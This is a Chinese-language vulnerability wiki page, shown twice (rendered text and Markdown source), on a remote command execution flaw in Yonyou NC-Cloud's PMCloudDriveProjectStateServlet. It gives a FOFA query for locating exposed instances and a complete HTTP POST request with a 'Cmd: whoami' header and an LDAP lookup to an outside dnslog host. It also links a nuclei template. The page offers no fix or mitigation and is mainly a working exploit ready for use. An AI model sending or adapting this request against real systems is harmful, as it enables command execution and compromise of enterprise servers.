fofamini-wiki

登录白背景

源码

用友NC-Cloud PMCloudDriveProjectStateServlet 存在远程命令执行漏洞

一、漏洞简介

用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud PMCloudDriveProjectStateServlet 存在远程命令执行漏洞。

二、影响版本

用友NC-Cloud

三、资产测绘

fofaapp="用友-NC-Cloud"
登录页面

四、漏洞复现

用yakit生成dnslog域名

探测是否存在漏洞

POST /service/~aert/PMCloudDriveProjectStateServlet HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cmd: whoami
Cookie: JSESSIONID=53521AE090615957863B7EFC1AEC1F39.server
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

{"data_source":"ldap://4vfh9q.dnslog.cn","user":"admin","pk_group":"111"}

nuclei脚本
用友-nc-cloud-pmclouddriveprojectstateservlet-远程命令执行.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/goepnqvqeoypgstv

# 用友NC-Cloud PMCloudDriveProjectStateServlet 存在远程命令执行漏洞

# 一、漏洞简介
用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud PMCloudDriveProjectStateServlet 存在远程命令执行漏洞。

# 二、影响版本

- 用友NC-Cloud

# 三、资产测绘

- fofa`app="用友-NC-Cloud"`
- 登录页面

![image.png](./img/udNRUPZusOGCiefB/1693575676700-0c5fed77-e3d1-4473-97a7-bfb8e7ae0bc1-633226.png)

## 四、漏洞复现

1. 用yakit生成dnslog域名

![image.png](./img/udNRUPZusOGCiefB/1703405052564-9850bf97-1adc-4498-9736-b1db21e920fe-969579.png)

2. 探测是否存在漏洞
```java
POST /service/~aert/PMCloudDriveProjectStateServlet HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cmd: whoami
Cookie: JSESSIONID=53521AE090615957863B7EFC1AEC1F39.server
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

{"data_source":"ldap://4vfh9q.dnslog.cn","user":"admin","pk_group":"111"}
```
![image.png](./img/udNRUPZusOGCiefB/1703405103453-7e14b76e-d3be-41c8-b0b8-0626120ad0c3-648539.png)
![image.png](./img/udNRUPZusOGCiefB/1703405123841-eb9a2287-a125-454f-9f00-de921e40eb5b-326332.png)
nuclei脚本
[用友-nc-cloud-pmclouddriveprojectstateservlet-远程命令执行.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219610831-debca15c-ed86-4c46-8d88-c4516128e69d.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219610831-debca15c-ed86-4c46-8d88-c4516128e69d.yaml%22%2C%22name%22%3A%22%E7%94%A8%E5%8F%8B-nc-cloud-pmclouddriveprojectstateservlet-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.yaml%22%2C%22size%22%3A834%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u3bffe03a-14c3-4f15-9b1c-d827d01cd5a%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u53a76ccb%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/goepnqvqeoypgstv>